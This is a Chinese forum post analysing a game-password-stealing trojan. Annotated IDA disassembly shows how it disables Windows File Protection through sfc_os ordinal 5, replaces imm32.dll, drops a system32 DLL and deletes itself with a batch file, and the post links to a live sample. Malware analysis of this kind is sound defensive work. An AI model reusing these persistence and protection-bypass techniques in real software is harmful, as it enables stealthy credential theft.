好友
阅读权限20
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 huzhao23 于 2010-2-20 14:54 编辑
今天去了一些反病毒的论坛逛了下,在剑盟病毒样本区下了一个病毒(Trojan.PSW.Win32.GameOnline.gcp),于是就要了下文:
病毒文件有壳,Upack 0.3.9 beta2s -> Dwing [Overlay],简单的压缩壳,脱之,单步几下就到了OEP ,修复并保存。
然后丢到IDA 里分析:
.Upack:00402E87 push edi ; 入口
.Upack:00402E88 xor edi, edi
.Upack:00402E88
.Upack:00402E8A
.Upack:00402E8A loc_402E8A:
.Upack:00402E8A inc edi
.Upack:00402E8B cmp edi, 2000000h
.Upack:00402E91 jz short loc_402E95
.Upack:00402E91
.Upack:00402E93 jmp short loc_402E8A
.Upack:00402E93
.Upack:00402E95 ; ---------------------------------------------------------------------------
.Upack:00402E95
.Upack:00402E95 loc_402E95:
.Upack:00402E95 call sub_402F55 ; 保存查询到的虚拟地址空间状态信息
.Upack:00402E95 ; "MZKERNEL32.DLL" 字符串地址给EAX,也就是基址给EAX
.Upack:00402E95
.Upack:00402E9A mov edi, eax
.Upack:00402E9C push 0 ; lpModuleName
.Upack:00402E9E call ds:GetModuleHandleA ; 获取MZKERNEL32.DLL 基址
.Upack:00402E9E
.Upack:00402EA4 cmp eax, edi
.Upack:00402EA6 pop edi
.Upack:00402EA7 jnz sub_402467
.Upack:00402EA7
.Upack:00402EAD jmp loc_402E5A
.Upack:00402EAD
.Upack:00402EAD start endp
来到loc_402E5A 这里(病毒运行的几个重要的call)
.Upack:00402E5A and dword_407E04, 0
.Upack:00402E61 call sub_402382 ; 关键call 1 F7
.Upack:00402E61
.Upack:00402E66 push offset dword_407D00 ; bmtpws31.dat 文件在内存里的指针
.Upack:00402E6B call sub_4040E1 ; 关键call 2 F7 将信息读入INI 文件,并将信息从INI文件中读入到程序的变量中
.Upack:00402E6B
.Upack:00402E70 call sub_402D82 ; 关键call 3 F7
.Upack:00402E70
.Upack:00402E75 call sub_40254C ; 病毒插入的系统进程ID
.Upack:00402E75
.Upack:00402E7A call sub_4035F3 ; 关键call 4 F7
进入关键call 1 (call sub_402382 ),代码如下
.Upack:00402382 sub_402382 proc near
.Upack:00402382
.Upack:00402382 push esi
.Upack:00402383 mov esi, offset Buffer
.Upack:00402388 push 104h ; uSize
.Upack:0040238D push esi ; lpBuffer
.Upack:0040238E call ds:GetSystemDirectoryA ; 获取系统下C:\WINDOWS\system32 目录的路径,并把路径保留在ESI的buffer里
.Upack:0040238E
.Upack:00402394 push offset asc_4072C0 ; "\\"
.Upack:00402399 push esi
.Upack:0040239A call _mbscat
.Upack:0040239A
.Upack:0040239F push esi
.Upack:004023A0 mov esi, offset dword_407D00
.Upack:004023A5 push esi
.Upack:004023A6 call _mbscpy ; C:\WINDOWS\system32\ 字符串复制到ESI 的buffer 里
.Upack:004023A6
.Upack:004023AB push offset s->Drivers ; "drivers\\"
.Upack:004023B0 push esi
.Upack:004023B1 call _mbscat ; 获取C:\WINDOWS\system32\drivers\ 驱动目录
.Upack:004023B1
.Upack:004023B6 push offset s->Bmtpws31_dat ; "bmtpws31.dat"
.Upack:004023BB push esi
.Upack:004023BC call _mbscat ; 得到bmtpws31.dat 文件的生成路径为C:\WINDOWS\system32\drivers\bmtpws31.dat
.Upack:004023BC
.Upack:004023C1 add esp, 20h
.Upack:004023C4 pop esi
.Upack:004023C5 retn
进入关键call 2 ( call sub_4040E1),代码如下(仅贴出重要的代码部分)
.Upack:004040E1 push ebp (call 2 的入口)
.Upack:004040E2 mov ebp, esp
.Upack:004040E4 sub esp, 290h
.Upack:004040EA push ebx
.Upack:004040EB push esi
.Upack:004040EC push edi
.Upack:004040ED lea eax, [ebp+Address]
.Upack:004040F3 push 104h ; nSize
.Upack:004040F8 xor edi, edi
.Upack:004040FA push eax ; lpFilename
.Upack:004040FB push edi ; hModule
.Upack:004040FC call ds:GetModuleFileNameA ; 获取程序当前执行路径
.Upack:004040FC
.Upack:00404102 lea eax, [ebp+Address] ; 把C:\Documents andSettings\Administrator\桌面\Trojan.PSW.Win32.GameOnline.gcp\unpacked.exe
路径的指针给EAX
.Upack:00404108 push eax ; lpAddress
.Upack:00404109 lea eax, [ebp+String]
.Upack:0040410F push eax ; Dst
.Upack:00404110 call sub_403CA7 ; 创建unpacked.exe文件,并映射到内存中运行
.Upack:00404110
.Upack:00404115 test eax, eax
.Upack:00404117 jz loc_40431A
.Upack:00404117
.Upack:0040411D push [ebp+lpFileName] ; lpFileName
.Upack:00404120 mov [ebp+var_C], edi
.Upack:00404123 mov [ebp+var_8], edi
.Upack:00404126 call sub_403F7A ; 解压数据
.Upack:00404126
进入关键call 3 (call sub_402D82 ),代码如下
.Upack:00402D82 push ebp
.Upack:00402D83 mov ebp, esp
.Upack:00402D85 sub esp, 33Ch
.Upack:00402D8B push esi
.Upack:00402D8C lea eax, [ebp+SystemTime]
.Upack:00402D8F push edi
.Upack:00402D90 push eax ; lpSystemTime
.Upack:00402D91 call ds:GetLocalTime ; 获取系统时间
.Upack:00402D91
.Upack:00402D97 movzx eax, [ebp+SystemTime.wSecond]
.Upack:00402D9B push eax
.Upack:00402D9C mov esi, offset Buffer
.Upack:00402DA1 movzx eax, [ebp+SystemTime.wMinute]
.Upack:00402DA5 push eax
.Upack:00402DA6 movzx eax, [ebp+SystemTime.wHour]
.Upack:00402DAA push eax
.Upack:00402DAB movzx eax, [ebp+SystemTime.wDay]
.Upack:00402DAF push eax
.Upack:00402DB0 push 8
.Upack:00402DB2 push offset s->Kb ; "kb"
.Upack:00402DB7 push esi
.Upack:00402DB8 lea eax, [ebp+String]
.Upack:00402DBE push offset s->SSDDDDD_dll ; "%s%s%d%d%d%d%d.dll"
.Upack:00402DC3 push eax ; Dest
.Upack:00402DC4 call ds:sprintf ; 上面的几行代码是进行字符拼装,在C:\WINDOWS\system32\ 得到kb81204819.dll
.Upack:00402DC4
.Upack:00402DCA lea eax, [ebp+FileName]
.Upack:00402DD0 push esi
.Upack:00402DD1 push eax
.Upack:00402DD2 call _mbscpy ; 把C:\WINDOWS\system32\ 复制到堆栈中
.Upack:00402DD2
.Upack:00402DD7 lea eax, [ebp+FileName]
.Upack:00402DDD push offset s->Wsconfig_db ; "wsconfig.db"
.Upack:00402DE2 push eax
.Upack:00402DE3 call _mbscat ; 得到C:\WINDOWS\system32\wsconfig.db
.Upack:00402DE3
.Upack:00402DE8 add esp, 34h
.Upack:00402DEB xor eax, eax
.Upack:00402DED lea edi, [ebp+var_2F]
.Upack:00402DF0 push 7
.Upack:00402DF2 pop ecx
.Upack:00402DF3 rep stosd
.Upack:00402DF5 stosw
.Upack:00402DF7 stosb
.Upack:00402DF8 lea eax, [ebp+FileName]
.Upack:00402DFE mov [ebp+KeyName], 69h
.Upack:00402E02 push eax ; lpFileName
.Upack:00402E03 lea eax, [ebp+String]
.Upack:00402E09 push eax ; lpString
.Upack:00402E0A lea eax, [ebp+KeyName]
.Upack:00402E0D push eax ; lpKeyName
.Upack:00402E0E push offset AppName ; "0"
.Upack:00402E13 call ds:WritePrivateProfileStringA ; 给指定的注册表里写入String = "C:\WINDOWS\system32\kb81204819.dll"数值
.Upack:00402E13
.Upack:00402E19 call sub_402BE7 ; 关键CALL 5 F7
.Upack:00402E19
.Upack:00402E1E lea eax, [ebp+ExistingFileName]
.Upack:00402E24 push 104h ; nSize
.Upack:00402E29 push eax ; lpFilename
.Upack:00402E2A push 0 ; hModule
.Upack:00402E2C call ds:GetModuleFileNameA ; 获取C:\WINDOWS\system32\kb81204819.dll 的句柄
.Upack:00402E2C
.Upack:00402E32 lea eax, [ebp+String]
.Upack:00402E38 push 0 ; bFailIfExists
.Upack:00402E3A push eax ; lpNewFileName
.Upack:00402E3B lea eax, [ebp+ExistingFileName]
.Upack:00402E41 push eax ; lpExistingFileName
.Upack:00402E42 call ds:CopyFileA ; 复制(C:\Documents and Settings\Administrator\桌面\Trojan.PSW.Win32.GameOnline.gcp\unpacked.exe
->C:\WINDOWS\system32\kb81121548.dll)
.Upack:00402E42
.Upack:00402E48 lea eax, [ebp+String]
.Upack:00402E4E push 1 ; int
.Upack:00402E50 push eax ; FileSizeHigh
.Upack:00402E51 call sub_402FFE ; 关键call 6 F7
.Upack:00402E51
.Upack:00402E56 pop edi
.Upack:00402E57 pop esi
.Upack:00402E58 leave
.Upack:00402E59 retn
进入关键call 5 (call sub_402BE7 ),代码如下
.Upack:00402BE7 push ebp
.Upack:00402BE8 mov ebp, esp
.Upack:00402BEA sub esp, 820h
.Upack:00402BF0 push esi
.Upack:00402BF1 push edi
.Upack:00402BF2 push offset s->Sedebugprivilege ; "SeDebugPrivilege"
.Upack:00402BF7 call sub_403727 ; 设置调试器权限
.Upack:00402BF7
.Upack:00402BFC mov esi, 104h
.Upack:00402C01 lea eax, [ebp+Buffer]
.Upack:00402C07 push esi ; uSize
.Upack:00402C08 push eax ; lpBuffer
.Upack:00402C09 call ds:GetSystemDirectoryA ; 获取系统system32 目录的路径
.Upack:00402C09
.Upack:00402C0F lea eax, [ebp+Buffer]
.Upack:00402C15 push eax
.Upack:00402C16 lea eax, [ebp+ExistingFileName]
.Upack:00402C1C push eax
.Upack:00402C1D call _mbscpy
.Upack:00402C1D
.Upack:00402C22 lea eax, [ebp+ExistingFileName]
.Upack:00402C28 push offset s->Imm32_dll ; "\\imm32.dll"
.Upack:00402C2D push eax
.Upack:00402C2E call _mbscat ; 得到 "C:\WINDOWS\system32\imm32.dll"
.Upack:00402C2E
.Upack:00402C33 lea eax, [ebp+ExistingFileName]
.Upack:00402C39 push eax
.Upack:00402C3A lea eax, [ebp+NewFileName]
.Upack:00402C40 push eax
.Upack:00402C41 call _mbscpy ; 把"C:\WINDOWS\system32\imm32.dll" 复制到堆栈空间
.Upack:00402C41
.Upack:00402C46 lea eax, [ebp+NewFileName]
.Upack:00402C4C push offset s->_bak ; ".bak"
.Upack:00402C51 push eax
.Upack:00402C52 call _mbscat ; 创建C:\WINDOWS\system32\imm32.dll 文件备份 imm32.dll.bak
.Upack:00402C52
.Upack:00402C57 add esp, 20h
.Upack:00402C5A lea eax, [ebp+PathName]
.Upack:00402C60 push eax ; lpBuffer
.Upack:00402C61 push esi ; nBufferLength
.Upack:00402C62 call ds:GetTempPathA ; 获取系统临时文件夹的路径
.Upack:00402C62
.Upack:00402C68 mov edi, ds:GetTempFileNameA
.Upack:00402C6E lea eax, [ebp+FileName]
.Upack:00402C74 push eax ; lpTempFileName
.Upack:00402C75 push 0 ; uUnique
.Upack:00402C77 lea eax, [ebp+PathName]
.Upack:00402C7D push offset PrefixString ; "~t1"
.Upack:00402C82 push eax ; lpPathName
.Upack:00402C83 call edi ; GetTempFileNameA ; 在临时文件夹里创建C:\Documents and Settings\Administrator\Local Settings\Temp\~t1E.tmp
.Upack:00402C83
.Upack:00402C85 lea eax, [ebp+var_410]
.Upack:00402C8B push eax ; lpTempFileName
.Upack:00402C8C push 0 ; uUnique
.Upack:00402C8E lea eax, [ebp+PathName]
.Upack:00402C94 push offset s->T2 ; "~t2"
.Upack:00402C99 push eax ; lpPathName
.Upack:00402C9A call edi ; GetTempFileNameA ; 在临时文件夹里创建C:\Documents and Settings\Administrator\Local Settings\Temp\~t222.tmp
.Upack:00402C9A
.Upack:00402C9C mov edi, ds:DeleteFileA
.Upack:00402CA2 lea eax, [ebp+FileName]
.Upack:00402CA8 push eax ; lpFileName
.Upack:00402CA9 call edi ; DeleteFileA
.Upack:00402CA9
.Upack:00402CAB lea eax, [ebp+var_410]
.Upack:00402CB1 push eax ; lpFileName
.Upack:00402CB2 call edi ; DeleteFileA
.Upack:00402CB2
.Upack:00402CB4 lea eax, [ebp+FileName]
.Upack:00402CBA push eax ; lpNewFileName
.Upack:00402CBB lea eax, [ebp+ExistingFileName]
.Upack:00402CC1 push eax ; lpFileName
.Upack:00402CC2 call sub_4028C7 ; 关键call 写数据
.Upack:00402CC2
.Upack:00402CC7 test eax, eax
.Upack:00402CC9 jz loc_402D7C
.Upack:00402CC9
.Upack:00402CCF cmp eax, 0FFFFFFFFh
.Upack:00402CD2 jz loc_402D7C
.Upack:00402CD2
.Upack:00402CD8 push ebx
.Upack:00402CD9 mov ebx, ds:CopyFileA
.Upack:00402CDF lea eax, [ebp+NewFileName]
.Upack:00402CE5 push 1 ; bFailIfExists
.Upack:00402CE7 push eax ; lpNewFileName
.Upack:00402CE8 lea eax, [ebp+ExistingFileName]
.Upack:00402CEE push eax ; lpExistingFileName
.Upack:00402CEF call ebx ; CopyFileA ; 复制(C:\WINDOWS\system32\imm32.dll->C:\WINDOWS\system32\imm32.dll.bak)
.Upack:00402CEF
.Upack:00402CF1 mov edi, ds:LoadLibraryA
.Upack:00402CF7 lea eax, [ebp+ExistingFileName]
.Upack:00402CFD push eax ; lpLibFileName
.Upack:00402CFE call edi ; LoadLibraryA ; 加载(C:\WINDOWS\system32\imm32.dll)
.Upack:00402CFE
.Upack:00402D00 push eax ; hLibModule
.Upack:00402D01 call ds:FreeLibrary
.Upack:00402D01
.Upack:00402D07 lea eax, [ebp+WideCharStr]
.Upack:00402D0D push esi ; cchWideChar
.Upack:00402D0E push eax ; lpWideCharStr
.Upack:00402D0F lea eax, [ebp+ExistingFileName]
.Upack:00402D15 push 0FFFFFFFFh ; cbMultiByte
.Upack:00402D17 xor esi, esi
.Upack:00402D19 push eax ; lpMultiByteStr
.Upack:00402D1A push esi ; dwFlags
.Upack:00402D1B push esi ; CodePage
.Upack:00402D1C call ds:MultiByteToWideChar
.Upack:00402D1C
.Upack:00402D22 push 5 ; lpProcName
.Upack:00402D24 push offset LibFileName ; "sfc_os.dll"
.Upack:00402D29 call edi ; LoadLibraryA ; 加载(sfc_os.dll)
.Upack:00402D29
.Upack:00402D2B push eax ; hModule
.Upack:00402D2C call ds:GetProcAddress ; 获取(sfc_os.#5)函数
.Upack:00402D2C
.Upack:00402D32 cmp eax, esi
.Upack:00402D34 jz short loc_402D42
.Upack:00402D34
.Upack:00402D36 lea ecx, [ebp+WideCharStr]
.Upack:00402D3C push 0FFFFFFFFh
.Upack:00402D3E push ecx
.Upack:00402D3F push esi
.Upack:00402D40 call eax
.Upack:00402D40
.Upack:00402D42
.Upack:00402D42 loc_402D42:
.Upack:00402D42 lea eax, [ebp+var_410]
.Upack:00402D48 push 1 ; dwFlags
.Upack:00402D4A push eax ; lpNewFileName
.Upack:00402D4B lea eax, [ebp+ExistingFileName]
.Upack:00402D51 push eax ; lpExistingFileName
.Upack:00402D52 call ds:MoveFileExA
.Upack:00402D52
.Upack:00402D58 lea eax, [ebp+ExistingFileName]
.Upack:00402D5E push esi ; bFailIfExists
.Upack:00402D5F push eax ; lpNewFileName
.Upack:00402D60 lea eax, [ebp+FileName]
.Upack:00402D66 push eax ; lpExistingFileName
.Upack:00402D67 call ebx ; CopyFileA ; 复制(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp->C:\WINDOWS\system32\imm32.dll)
.Upack:00402D67
.Upack:00402D69 lea eax, [ebp+FileName]
.Upack:00402D6F push eax ; lpFileName
.Upack:00402D70 call ds:DeleteFileA
.Upack:00402D70
.Upack:00402D76 push 1
.Upack:00402D78 pop eax
.Upack:00402D79 pop ebx
.Upack:00402D7A jmp short loc_402D7E
.Upack:00402D7A
.Upack:00402D7C ; ---------------------------------------------------------------------------
进入关键call 6 (call sub_402FFE ) ,代码如下:
.Upack:00402FFE push ebp
.Upack:00402FFF mov ebp, esp
.Upack:00403001 push ecx
.Upack:00403002 push ebx
.Upack:00403003 push esi
.Upack:00403004 xor esi, esi
.Upack:00403006 push esi ; hTemplateFile
.Upack:00403007 push esi ; dwFlagsAndAttributes
.Upack:00403008 push 3 ; dwCreationDisposition
.Upack:0040300A push esi ; lpSecurityAttributes
.Upack:0040300B push 1 ; dwShareMode
.Upack:0040300D push 0C0000000h ; dwDesiredAccess
.Upack:00403012 push [ebp+FileSizeHigh] ; lpFileName
.Upack:00403015 call ds:CreateFileA ; 在磁盘上创建(C:\WINDOWS\system32\kb81121548.dll)这个文件
.Upack:00403015
.Upack:0040301B mov ebx, eax
.Upack:0040301D cmp ebx, 0FFFFFFFFh
.Upack:00403020 mov [ebp+hObject], ebx
.Upack:00403023 jz short loc_403091
.Upack:00403023
.Upack:00403025 lea eax, [ebp+FileSizeHigh]
.Upack:00403028 push edi
.Upack:00403029 push eax ; lpFileSizeHigh
.Upack:0040302A push ebx ; hFile
.Upack:0040302B call ds:GetFileSize ; 获取文件大小
.Upack:0040302B
.Upack:00403031 mov edi, eax
.Upack:00403033 push esi ; lpName
.Upack:00403034 push edi ; dwMaximumSizeLow
.Upack:00403035 push [ebp+FileSizeHigh] ; dwMaximumSizeHigh
.Upack:00403038 push 4 ; flProtect
.Upack:0040303A push esi ; lpFileMappingAttributes
.Upack:0040303B push ebx ; hFile
.Upack:0040303C call ds:CreateFileMappingA ; 创建DLL 文件的内存镜象
.Upack:0040303C
.Upack:00403042 mov ebx, eax
.Upack:00403044 cmp ebx, esi
进入关键call (call sub_4035F3 ) ,代码如下:
.Upack:004035F3 push ebp
.Upack:004035F4 mov ebp, esp
.Upack:004035F6 sub esp, 510h
.Upack:004035FC push ebx
.Upack:004035FD push esi
.Upack:004035FE push edi
.Upack:004035FF lea eax, [ebp+Filename]
.Upack:00403605 push 104h ; nSize
.Upack:0040360A xor edi, edi
.Upack:0040360C push eax ; lpFilename
.Upack:0040360D push edi ; hModule
.Upack:0040360E call ds:GetModuleFileNameA ; 得到病毒文件在磁盘上的完整路径
.Upack:0040360E
.Upack:00403614 call ds:GetTickCount
.Upack:00403614
.Upack:0040361A mov ebx, eax
.Upack:0040361C lea eax, [ebp+Filename]
.Upack:00403622 mov esi, ds:sprintf
.Upack:00403628 push ebx
.Upack:00403629 push eax ; EAX 里是病毒文件完整的路径
.Upack:0040362A lea eax, [ebp+Filename]
.Upack:00403630 push eax
.Upack:00403631 lea eax, [ebp+Buffer]
.Upack:00403637 push offset s->RepeatDelSIfExistSGotoRepeatDelCDelX_bat ; ":Repeat\r\ndel \"%s\"\r\nif exist \"%s\" goto R"...
.Upack:0040363C push eax ; Dest
.Upack:0040363D call esi ; sprintf
.Upack:0040363D
.Upack:0040363F add esp, 14h
.Upack:00403642 lea eax, [ebp+FileName]
.Upack:00403648 push ebx
.Upack:00403649 push offset s->CDelX_bat ; "c:\\del%x.bat"
.Upack:0040364E push eax ; Dest
.Upack:0040364F call esi ; sprintf ; 得到ASCII "c:\del1d2c04.bat" 字符名称
.Upack:0040364F
.Upack:00403651 add esp, 0Ch
.Upack:00403654 lea eax, [ebp+FileName]
.Upack:0040365A push edi ; hTemplateFile
.Upack:0040365B push edi ; dwFlagsAndAttributes
.Upack:0040365C push 2 ; dwCreationDisposition
.Upack:0040365E push edi ; lpSecurityAttributes
.Upack:0040365F push 1 ; dwShareMode
.Upack:00403661 push 40000000h ; dwDesiredAccess
.Upack:00403666 push eax ; lpFileName
.Upack:00403667 call ds:CreateFileA ; 在系统C 盘根目录里创建del1d2c04.bat
.Upack:00403667
.Upack:0040366D mov esi, eax
.Upack:0040366F cmp esi, 0FFFFFFFFh
.Upack:00403672 jz short loc_4036E8
.Upack:00403672
.Upack:00403674 lea eax, [ebp+NumberOfBytesWritten]
.Upack:00403677 push edi ; lpOverlapped
.Upack:00403678 push eax ; lpNumberOfBytesWritten
.Upack:00403679 lea eax, [ebp+Buffer]
.Upack:0040367F push eax ; Str
.Upack:00403680 call strlen
.Upack:00403680
.Upack:00403685 pop ecx
.Upack:00403686 push eax ; nNumberOfBytesToWrite
.Upack:00403687 lea eax, [ebp+Buffer]
.Upack:0040368D push eax ; lpBuffer
.Upack:0040368E push esi ; hFile
.Upack:0040368F call ds:WriteFile ; 向bat文件里写入命令行
.Upack:0040368F
.Upack:00403695 push esi ; hObject
.Upack:00403696 call ds:CloseHandle
.Upack:00403696
.Upack:0040369C lea eax, [ebp+CmdLine]
.Upack:004036A2 push 103h ; nSize
.Upack:004036A7 push eax ; lpBuffer
.Upack:004036A8 push offset Name ; "ComSpec"
.Upack:004036AD call ds:GetEnvironmentVariableA
.Upack:004036AD
.Upack:004036B3 lea eax, [ebp+CmdLine]
.Upack:004036B9 push offset s->C ; " /c "
.Upack:004036BE push eax
.Upack:004036BF call _mbscat
.Upack:004036BF
.Upack:004036C4 lea eax, [ebp+FileName]
.Upack:004036CA push eax
.Upack:004036CB lea eax, [ebp+CmdLine]
.Upack:004036D1 push eax
.Upack:004036D2 call _mbscat
.Upack:004036D2
.Upack:004036D7 add esp, 10h
.Upack:004036DA lea eax, [ebp+CmdLine]
.Upack:004036E0 push edi ; uCmdShow
.Upack:004036E1 push eax ; lpCmdLine
.Upack:004036E2 call ds:WinExec ; 执行命令行(C:\WINDOWS\system32\cmd.exe /c c:\del8e73c.bat,0)
.Upack:004036E2
.Upack:004036E8
.Upack:004036E8 loc_4036E8: ;
.Upack:004036E8 pop edi
.Upack:004036E9 pop esi
.Upack:004036EA pop ebx
.Upack:004036EB leave
.Upack:004036EC retn
上面就是分析的过程,总结下:
病毒会在系统的临时文件夹里创建两个文件 (在你的电脑里文件名称可能不一样)
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t12.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t23.tmp
在系统的驱动文件夹里也创建了一个文件
C:\WINDOWS\system32\drivers\bmtpws31.dat
然后打开注册表,写入键值
HKLM\Software\Policies\Microsoft\Cryptography
接着
复制(C:\WINDOWS\system32\imm32.dll -> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp) 保存起来
同时在系统system32 目录下
创建imm32.dll
在临时文件夹里
创建(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp)
备份 (C:\WINDOWS\system32\imm32.dll->C:\WINDOWS\system32\imm32.dll.bak)
然后
复制(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp->C:\WINDOWS\system32\imm32.dll)
复制(C:\Documents and Settings\Administrator\桌面\Trojan.PSW.Win32.GameOnline.gcp\unpacked.exe->C:\WINDOWS\system32\kb81121548.dll)
创建C:\WINDOWS\system32\kb81121548.dll (主要的病毒释放文件)
最后
创建(c:\del8e73c.bat) ,执行WinExec(C:\WINDOWS\system32\cmd.exe /c c:\del8e73c.bat,0) 命令,销毁原始文件
分析就到这里,可能有些地方分析的不够详细,请各位大侠们指教。。。
BY:huzhao23 [LCG]
病毒样本:
Trojan.PSW.Win32.GameOnline.gcp.rar
(13.43 KB, 下载次数: 14)
|
免费评分
-
查看全部评分
|
发表于 2010-1-12 15:11
发表于 2010-1-12 15:27
发表于 2010-1-12 16:14
